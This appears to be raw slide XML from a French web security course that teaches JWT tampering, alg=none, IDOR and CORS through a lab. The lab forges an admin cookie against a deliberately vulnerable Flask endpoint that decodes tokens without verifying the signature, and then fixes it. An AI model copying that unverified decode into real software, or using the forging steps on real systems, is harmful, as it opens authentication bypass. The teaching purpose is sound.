        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On les revoit dans les labs. Ici : une phrase chacun.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1444751"/>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1005840" y="1444751"/>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325880" y="148132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JWT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="170078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JSON signé, pas chiffré. Tout le monde lit le milieu. Le cadenas, c’est la signature.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="223113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223113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25880" y="226771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alg=none</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2487168"/>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jeton dit « je ne suis pas signé ». Si le serveur croit le header, vous êtes admin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3017520"/>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05840" y="3017520"/>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325880" y="3054096"/>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IDOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="3273552"/>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Insecure Direct Object Reference. Une référence (l’id) vers un objet, en direct, sans vérifier que c’est à vous.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="38039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1005840" y="38039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325880" y="38404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Middleware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="40599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Une fonction devant la route. Express : app.use. Flask : décorateur. Auth, puis ownership.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="45902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005840" y="45902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325880" y="46268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CORS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="48463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Dit au navigateur quel JS a le droit de LIRE la réponse. Un POST part quand même.</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114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01</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JWT — falsifier, puis vérifier</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jwt.io  ·  un script  ·  /admin s’ouvre  ·  puis on ferme</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01 · jeton</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Un jeton, c’est quoi ?</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Après le login, le serveur a déjà décidé qui vous êtes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le jeton est la preuve renvoyée. Opaque (id de session) ou structuré (JWT).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JWT = trois bouts Base64url. Signé n’est pas chiffré. Tout le monde lit le milieu.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="1357884" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>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47688" y="1371600"/>
            <a:ext cx="1175004" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HEADER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647688" y="1783080"/>
            <a:ext cx="1175004" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>alg : HS256</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8076895" y="1051560"/>
            <a:ext cx="1357884" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>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186623" y="1371600"/>
            <a:ext cx="1175004" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PAYLOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8186623" y="1783080"/>
            <a:ext cx="1175004" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lu par tous</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9615830" y="1051560"/>
            <a:ext cx="1357884" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6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725558" y="1371600"/>
            <a:ext cx="1175004" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SIGNATURE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9725558" y="1783080"/>
            <a:ext cx="1175004" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>à vérifier</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01 · anatomie</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Un JWT, vu de loin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="11155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jwt.io  —  coller le jeton (déjà chargé si vous cliquez)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="138988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389888"/>
            <a:ext cx="64008" cy="132588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207008" y="146304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header . payload . signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="170078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eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>eyJzdWIiOiJhZG1pbiIsIm5hbWUiOiJBbm5lIn0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2807208"/>
            <a:ext cx="10058400" cy="226771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05840" y="2807208"/>
            <a:ext cx="64008" cy="22677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207008" y="288036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Console  ·  btoa / atob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="3118104"/>
            <a:ext cx="9729216" cy="188366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 encoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>btoa(JSON.stringify({ sub: "admin", name: "Anne" }))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// décoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>JSON.parse(atob("eyJzdWIiOiJhZG1pbiIsIm5hbWUiOiJBbm5lIn0"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// Base64url (+ → -, / → _, sans =) : annexe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>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Signé ≠ chiffré. Tout le monde lit le payload. btoa / atob suffisent.</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01 · tamper</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Devenir admin sans mot de passe</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Le serveur décode le JWT sans vérifier la signature.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vous changez role en admin, vous remettez le cookie. Le serveur croit le JSON.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pas de hash à casser. Le cadenas n’a jamais été fermé.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="4526280" cy="443484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537960" y="1051560"/>
            <a:ext cx="64008" cy="443484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739128" y="1124712"/>
            <a:ext cx="4251960" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnérable  ·  Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6739128" y="1362456"/>
            <a:ext cx="4197096" cy="405079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payload = jwt.decode(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    token,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    options={"verify_signature": False},</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>if payload.get("role") == "admin":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return admin_panel()</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B  ·  day-3/s1</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Vérifier le jeton des deux côtés</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Lab : day-3/s1. Cookie secu5d_auth, volontairement pas HttpOnly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Front : ne plus croire le payload. Back : signature, algo, exp. Les deux, sinon l’API reste ouverte.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d3s1-jwt-dashboard.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3113401" y="1591056"/>
            <a:ext cx="5934717"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But : admin en trichant le cookie, puis fermer le front ET l’API.</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119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A  ·  15 min</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Lire un JWT, sans magie</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https://jwt.io    ·    pas de backend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="157276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19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1792224"/>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Un JWT est du Base64. jwt.io ne fait que le découper.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="204825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Vous n’avez pas besoin du serveur pour lire le payload.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="230428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Si le payload contient un rôle, c’est déjà trop d’infos côté client.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="261518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Coller le token, lire sub et role. Rien n’est secret là-dedans.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rounded Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="339242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005840" y="339242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325880" y="346557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Ouvrir jwt.io. Coller le cookie session du lab.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="388620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05840" y="388620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325880" y="395935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Lire header.alg et payload.role.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="437997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005840" y="437997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325880" y="445312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Changer role casse la signature — sauf si le serveur ne vérifie pas.</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B  ·  90 min</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Falsifier, puis sécuriser les deux étages</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day-3/s1</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day-3/s1  ·  dashboard JWT</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Le cookie n’est pas HttpOnly. Vous le truquez dans DevTools. jwt.io.</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Le front lit role dans le payload. L’API aussi, sans vérifier la signature.</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Correctif : les deux étages. Masquer l’UI ne protège pas /users.</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Vérifier le token côté front ET côté back. Les deux, pas l’un.</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Cookie secu5d_auth → jwt.io. role: admin. Recharger /users.</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Front : HttpOnly + demander au serveur si la session est admin.</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Back : signature, algorithms=["HS256"], exp. Refuser le cookie truqué.</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snippets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Décoder n’est pas vérifier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="1874519"/>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874519"/>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  ·  Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="1490471"/>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payload = jwt.decode(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    token,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
